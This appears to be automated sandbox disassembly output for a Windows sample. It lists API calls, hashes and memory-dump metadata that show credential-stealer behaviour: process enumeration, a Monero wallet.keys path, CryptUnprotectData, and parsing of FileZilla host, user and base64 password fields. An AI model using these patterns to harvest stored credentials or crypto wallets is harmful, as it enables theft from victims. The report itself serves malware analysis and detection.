                            • Instruction Fuzzy Hash: FF010C75A00208EBCB24DFA5C949FEDB7F8FB48700F10418CA94AA7684D77AAB45CF50
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00ED05B7), ref: 00EC86CA
                            • Process32First.KERNEL32(?,00000128), ref: 00EC86DE
                            • Process32Next.KERNEL32(?,00000128), ref: 00EC86F3
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                            • CloseHandle.KERNEL32(?), ref: 00EC8761
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 4fdb7a289c0c71cf1ccf4ba63f241f0f30bc147c74a6e26cb3700882e1c16b9b
                            • Instruction ID: d06bd9337b4afd8207790a045c6a825d1a8ade3dd018f3bc9773b649302b106f
                            • Opcode Fuzzy Hash: 4fdb7a289c0c71cf1ccf4ba63f241f0f30bc147c74a6e26cb3700882e1c16b9b
                            • Instruction Fuzzy Hash: E4314F72901218EBCB24DF50DE45FEEB7B8EB44704F1051AEA50AB2190DB366A46CFA1
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,00EB5184,40000001,00000000,00000000,?,00EB5184), ref: 00EC8EC0
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00ED0E00,00000000,?), ref: 00EC79B0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC79B7
                            • GetLocalTime.KERNEL32(?,?,?,?,?,00ED0E00,00000000,?), ref: 00EC79C4
                            • wsprintfA.USER32 ref: 00EC79F3
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00A9D9C8,00000000,?,00ED0E10,00000000,?,00000000,00000000), ref: 00EC7A63
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC7A6A
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00A9D9C8,00000000,?,00ED0E10,00000000,?,00000000,00000000,?), ref: 00EC7A7D
                            • wsprintfA.USER32 ref: 00EC7AB7
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: /IW\$EL$XY{
                            • API String ID: 0-1040778048
                            APIs
                            • CoCreateInstance.COMBASE(00ECE118,00000000,00000001,00ECE108,00000000), ref: 00EC3758
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00EC37B0
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00EB9B84
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00EB9BA3
                            • LocalFree.KERNEL32(?), ref: 00EB9BD3
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: A=yo$CRq$t6Z
                            • API String ID: 0-3946353037
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: Y'o$a]}
                            • API String ID: 0-413318234
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: wIw~$X^
                            • API String ID: 0-987846827
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: 3{DY
                            • API String ID: 0-500985011
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: 5|\
                            • API String ID: 0-3903327528
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: v1
                            • API String ID: 0-3113600009
                            • Opcode ID: d061bd9c665eaac562cc38d74e6a9eb7670083273713579c53882f03964dbd0d
                            • Instruction ID: c77ec4e3954c2f7f867a7097376eb78b3f5bbef786bfd34e93490e3f731af073
                            • Opcode Fuzzy Hash: d061bd9c665eaac562cc38d74e6a9eb7670083273713579c53882f03964dbd0d
                            • Instruction Fuzzy Hash: 1B5156F7E081105BE308AE2DED0573AB7D2DFD0720F2B863DD98987784E9399C058692
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: *6K
                            • API String ID: 0-1576332575
                            • Opcode ID: efe6fdb33c3cd30a32d8ff1462826c3c9afe77818c2fb09da98f562b0229739b
                            • Instruction ID: 7e44920e1c3b67966cd9db23919e379f3cd4b7f22bd204f2fec2b04b707aae44
                            • Opcode Fuzzy Hash: efe6fdb33c3cd30a32d8ff1462826c3c9afe77818c2fb09da98f562b0229739b
                            • Instruction Fuzzy Hash: 2B3126F76291058FF74C6D3CED9A37B7AD6EB54310F29463DEA82C27C4ED28A9004255
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7565023c0a13fcf432fe27c40ebe2e17f67e910ee3be9337b5deeba30c9804a0
                            • Instruction ID: b002a41d1f167cdabe82d681ee91348d2e017191c876a7967f3e3b41f33cc601
                            • Opcode Fuzzy Hash: 7565023c0a13fcf432fe27c40ebe2e17f67e910ee3be9337b5deeba30c9804a0
                            • Instruction Fuzzy Hash: 4591E4F3A182009FF308AE39DC8537AB7D6EB94310F1A853DDBC587784E97948458786
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e6eac949e560daaac3d7aefe717704ebe8ae4806b3abe543889ed8d73b8ecaa1
                            • Instruction ID: b7bb758f7d3969b26e652b8e1b1741a284fbf73283d5085fc04aeaeb11e89a41
                            • Opcode Fuzzy Hash: e6eac949e560daaac3d7aefe717704ebe8ae4806b3abe543889ed8d73b8ecaa1
                            • Instruction Fuzzy Hash: 295159B3A083185FE3006E7DED8576BBBDADBD4230F2B463EE984C3748E97559054292
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 42e08f651da0986346a13dd00abcd7a5bee16645ccd5a981fa56f8d396e3e549
                            • Instruction ID: 14c0397f7656414f983149431464487bee2f59d9e9a1f01c635f0ca37187dcbd
                            • Opcode Fuzzy Hash: 42e08f651da0986346a13dd00abcd7a5bee16645ccd5a981fa56f8d396e3e549
                            • Instruction Fuzzy Hash: D651F8F3E096105FF308AA2DDC9577BB7D6DBD4320F1B853DAAC887744E93858028696
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 56cfeeb526c2752c148f1f530e93f1629d2e60cb532cb812a936f4141da4e995
                            • Instruction ID: d458d9369e465ec71842f20ad004810c91235cd6c098dbef56ef575db661aeca
                            • Opcode Fuzzy Hash: 56cfeeb526c2752c148f1f530e93f1629d2e60cb532cb812a936f4141da4e995
                            • Instruction Fuzzy Hash: 7351C2F3A1C6145FF3186E28DC8677AB7D6EB94310F1A853DDBC887380E9395814878A
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fd6e72e764fa950d8401a2ddca3068dd686751134510031c221f9e1716f2e4ad
                            • Instruction ID: 76aa682c41d999d192a0ba0eff4de3bc71bd801ec1e55415625798205cdc6d8b
                            • Opcode Fuzzy Hash: fd6e72e764fa950d8401a2ddca3068dd686751134510031c221f9e1716f2e4ad
                            • Instruction Fuzzy Hash: 5F5191B2A096005FE314AF2DEC8176ABBE6EBD4310F06893DD5C4C7344EA755455C787
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00EC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EC8E0B
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                              • Part of subcall function 00EB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EB99EC
                              • Part of subcall function 00EB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EB9A11
                              • Part of subcall function 00EB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EB9A31
                              • Part of subcall function 00EB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EB148F,00000000), ref: 00EB9A5A
                              • Part of subcall function 00EB99C0: LocalFree.KERNEL32(00EB148F), ref: 00EB9A90
                              • Part of subcall function 00EB99C0: CloseHandle.KERNEL32(000000FF), ref: 00EB9A9A
                              • Part of subcall function 00EC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EC8E52
                            • GetProcessHeap.KERNEL32(00000000,000F423F,00ED0DBA,00ED0DB7,00ED0DB6,00ED0DB3), ref: 00EC0362
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC0369
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00EC0385
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED0DB2), ref: 00EC0393
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 00EC03CF
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED0DB2), ref: 00EC03DD
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00EC0419
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED0DB2), ref: 00EC0427
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00EC0463
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED0DB2), ref: 00EC0475
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED0DB2), ref: 00EC0502
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED0DB2), ref: 00EC051A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED0DB2), ref: 00EC0532
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED0DB2), ref: 00EC054A
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00EC0562
                            • lstrcat.KERNEL32(?,profile: null), ref: 00EC0571
                            • lstrcat.KERNEL32(?,url: ), ref: 00EC0580
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC0593
                            • lstrcat.KERNEL32(?,00ED1678), ref: 00EC05A2
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC05B5
                            • lstrcat.KERNEL32(?,00ED167C), ref: 00EC05C4
                            • lstrcat.KERNEL32(?,login: ), ref: 00EC05D3
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC05E6
                            • lstrcat.KERNEL32(?,00ED1688), ref: 00EC05F5
                            • lstrcat.KERNEL32(?,password: ), ref: 00EC0604
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC0617
                            • lstrcat.KERNEL32(?,00ED1698), ref: 00EC0626
                            • lstrcat.KERNEL32(?,00ED169C), ref: 00EC0635
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED0DB2), ref: 00EC068E
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
